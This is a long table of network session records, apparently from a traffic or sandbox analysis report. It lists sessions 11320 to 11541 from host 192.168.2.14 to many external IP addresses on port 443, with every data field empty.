                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11320192.168.2.1453720143.203.238.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11321192.168.2.1455672182.93.186.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11322192.168.2.1448224175.47.16.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11323192.168.2.145038413.237.215.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11324192.168.2.143966652.155.65.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11325192.168.2.144299412.242.230.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11326192.168.2.1443608102.64.198.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11327192.168.2.1452556128.227.174.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11328192.168.2.1447404171.236.251.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11329192.168.2.1458814177.100.149.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11330192.168.2.1446166217.185.192.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11331192.168.2.1460294128.14.176.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11332192.168.2.144506066.93.137.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11333192.168.2.1454438140.168.226.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11334192.168.2.1434210104.92.227.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11335192.168.2.1433996118.189.240.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11336192.168.2.1454420146.80.37.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11337192.168.2.1433796204.176.162.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11338192.168.2.143792297.18.120.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11339192.168.2.1440932105.171.208.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11340192.168.2.1442988154.106.81.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11341192.168.2.1446356189.147.58.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11342192.168.2.1449030182.233.141.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11343192.168.2.1443288111.113.30.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11344192.168.2.1452514221.173.66.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11345192.168.2.144113270.172.41.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11346192.168.2.1458376142.114.32.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11347192.168.2.1441430209.54.240.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11348192.168.2.145868823.154.178.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11349192.168.2.1460390128.102.151.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11350192.168.2.143474835.31.26.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11351192.168.2.144079861.86.185.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11352192.168.2.145262264.227.166.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11353192.168.2.1452860160.188.3.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11354192.168.2.145471624.129.212.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11355192.168.2.1457942198.167.207.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11356192.168.2.145512667.15.118.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11357192.168.2.145102483.117.159.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11358192.168.2.143276871.244.244.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11359192.168.2.1451770171.198.149.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11360192.168.2.144492632.186.217.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11361192.168.2.1450090102.82.254.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11362192.168.2.145942634.2.150.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11363192.168.2.1445500170.6.105.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11364192.168.2.1447466154.230.185.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11365192.168.2.146022638.106.219.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11366192.168.2.1442026155.174.36.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11367192.168.2.1451900205.229.89.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11368192.168.2.143729852.44.252.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11369192.168.2.1438398163.198.192.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11370192.168.2.1451590191.190.37.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11371192.168.2.143443888.170.96.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11372192.168.2.1459318169.122.231.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11373192.168.2.1449408113.205.45.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11374192.168.2.145647886.252.90.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11375192.168.2.1449574149.203.213.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11376192.168.2.1453478173.134.106.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11377192.168.2.1446730190.115.253.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11378192.168.2.145901239.78.28.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11379192.168.2.146074071.50.251.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11380192.168.2.144589657.30.26.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11381192.168.2.1436886107.71.169.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11382192.168.2.1460166166.67.182.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11383192.168.2.146050051.166.226.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11384192.168.2.145948836.238.177.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11385192.168.2.1452072164.34.171.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11386192.168.2.1443194119.243.244.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11387192.168.2.145579048.163.253.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11388192.168.2.1459708211.178.173.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11389192.168.2.1460502169.4.188.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11390192.168.2.1450666107.15.92.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11391192.168.2.143945867.119.11.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11392192.168.2.145354262.221.173.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11393192.168.2.1449746183.224.248.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11394192.168.2.1441562131.141.162.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11395192.168.2.1439178203.102.245.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11396192.168.2.144978867.117.238.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11397192.168.2.1448948191.147.241.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11398192.168.2.1441374151.98.114.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11399192.168.2.1443440216.139.28.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11400192.168.2.145029625.45.103.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11401192.168.2.1460910184.53.38.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11402192.168.2.145841079.212.19.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11403192.168.2.14543468.70.221.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11404192.168.2.1460664159.121.177.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11405192.168.2.14584449.16.226.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11406192.168.2.1450372152.80.13.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11407192.168.2.143722220.201.172.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11408192.168.2.144103218.44.19.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11409192.168.2.1435364117.53.88.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11410192.168.2.1448792169.216.105.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11411192.168.2.144444285.190.15.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11412192.168.2.1453250144.41.41.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11413192.168.2.144273412.123.119.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11414192.168.2.1450092206.34.66.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11415192.168.2.1439094189.170.49.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11416192.168.2.143322299.155.16.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11417192.168.2.144003086.204.123.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11418192.168.2.143781885.86.35.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11419192.168.2.1457618162.168.64.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11420192.168.2.144761085.159.6.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11421192.168.2.1443366140.21.139.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11422192.168.2.1433672155.209.9.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11423192.168.2.1436704183.171.80.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11424192.168.2.145843248.195.243.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11425192.168.2.1451386139.186.150.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11426192.168.2.1457282133.3.80.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11427192.168.2.1438014217.237.2.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11428192.168.2.143722696.116.52.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11429192.168.2.1440598152.72.149.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11430192.168.2.14343781.200.197.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11431192.168.2.144966649.57.196.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11432192.168.2.1442070157.216.250.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11433192.168.2.144845075.18.171.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11434192.168.2.144870051.216.186.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11435192.168.2.144645685.29.82.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11436192.168.2.144355820.50.240.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11437192.168.2.144159823.11.79.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11438192.168.2.1450088165.246.38.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11439192.168.2.145184481.224.221.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11440192.168.2.1445564114.13.119.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11441192.168.2.144109650.31.123.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11442192.168.2.1433108110.157.63.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11443192.168.2.1454912207.3.92.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11444192.168.2.143336881.111.50.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11445192.168.2.1456986172.236.82.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11446192.168.2.144265254.227.60.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11447192.168.2.1434590114.240.60.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11448192.168.2.145019879.47.75.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11449192.168.2.1443918169.79.207.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11450192.168.2.1439392180.65.239.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11451192.168.2.143984690.224.6.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11452192.168.2.145588214.136.164.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11453192.168.2.1436288206.250.124.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11454192.168.2.143364088.41.64.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11455192.168.2.144448876.193.222.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11456192.168.2.143380270.203.241.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11457192.168.2.1459910151.137.155.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11458192.168.2.1442100112.36.234.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11459192.168.2.143919250.190.177.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11460192.168.2.143563651.180.51.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11461192.168.2.1437090141.85.208.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11462192.168.2.1444654132.52.86.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11463192.168.2.1451854105.105.120.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11464192.168.2.144611854.176.9.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11465192.168.2.1436508207.64.72.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11466192.168.2.145518866.247.128.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11467192.168.2.143581464.37.78.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11468192.168.2.1440274212.121.205.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11469192.168.2.1448512218.34.225.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11470192.168.2.144576018.172.41.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11471192.168.2.1460038110.94.31.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11472192.168.2.143729037.128.180.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11473192.168.2.1438602139.123.23.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11474192.168.2.1448216154.217.8.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11475192.168.2.144987220.84.43.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11476192.168.2.1435832222.89.240.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11477192.168.2.144820248.64.81.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11478192.168.2.1452898150.35.2.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11479192.168.2.144999427.109.96.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11480192.168.2.14357062.2.190.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11481192.168.2.14593889.101.141.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11482192.168.2.144408694.240.209.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11483192.168.2.1451626135.211.194.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11484192.168.2.1452156119.234.133.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11485192.168.2.1450030136.166.141.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11486192.168.2.144206264.226.240.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11487192.168.2.1441004152.96.152.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11488192.168.2.144061247.155.206.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11489192.168.2.1437698137.91.24.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11490192.168.2.144852427.184.216.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11491192.168.2.1447034118.226.23.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11492192.168.2.14384122.183.209.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11493192.168.2.1437096196.16.125.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11494192.168.2.1453062207.253.94.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11495192.168.2.146070447.227.204.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11496192.168.2.1439044222.232.39.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11497192.168.2.145488893.160.94.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11498192.168.2.1451112207.159.74.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11499192.168.2.145606831.177.47.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11500192.168.2.144569850.134.100.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11501192.168.2.1439364202.9.160.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11502192.168.2.144444439.199.130.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11503192.168.2.144187619.235.2.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11504192.168.2.144640262.120.235.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11505192.168.2.1440208102.210.225.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11506192.168.2.1451280205.21.228.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11507192.168.2.1434140152.48.140.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11508192.168.2.1460436136.46.101.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11509192.168.2.145877444.44.123.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11510192.168.2.144326492.176.202.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11511192.168.2.1452476149.12.88.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11512192.168.2.1436152176.225.120.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11513192.168.2.144288639.250.1.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11514192.168.2.1453714218.56.202.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11515192.168.2.144930280.234.143.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11516192.168.2.143368875.240.251.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11517192.168.2.1448954132.179.60.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11518192.168.2.1435360113.223.254.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11519192.168.2.1436346204.243.62.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11520192.168.2.144594234.207.236.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11521192.168.2.1435594121.98.117.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11522192.168.2.1437452136.63.65.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11523192.168.2.144336265.162.175.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11524192.168.2.1457016115.124.105.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11525192.168.2.145611880.205.124.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11526192.168.2.1455920191.152.51.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11527192.168.2.1459900151.185.60.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11528192.168.2.1458494208.0.111.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11529192.168.2.145046659.146.88.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11530192.168.2.144219482.12.208.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11531192.168.2.145731683.88.235.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11532192.168.2.144199496.217.90.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11533192.168.2.1445716198.170.94.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11534192.168.2.143429875.245.223.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11535192.168.2.144498477.34.85.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11536192.168.2.1442870177.70.163.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11537192.168.2.143614695.203.67.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11538192.168.2.1451364206.80.32.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11539192.168.2.144337042.216.235.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11540192.168.2.1443690184.129.193.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11541192.168.2.1455650144.57.43.193443
                                              TimestampBytes transferredDirectionData


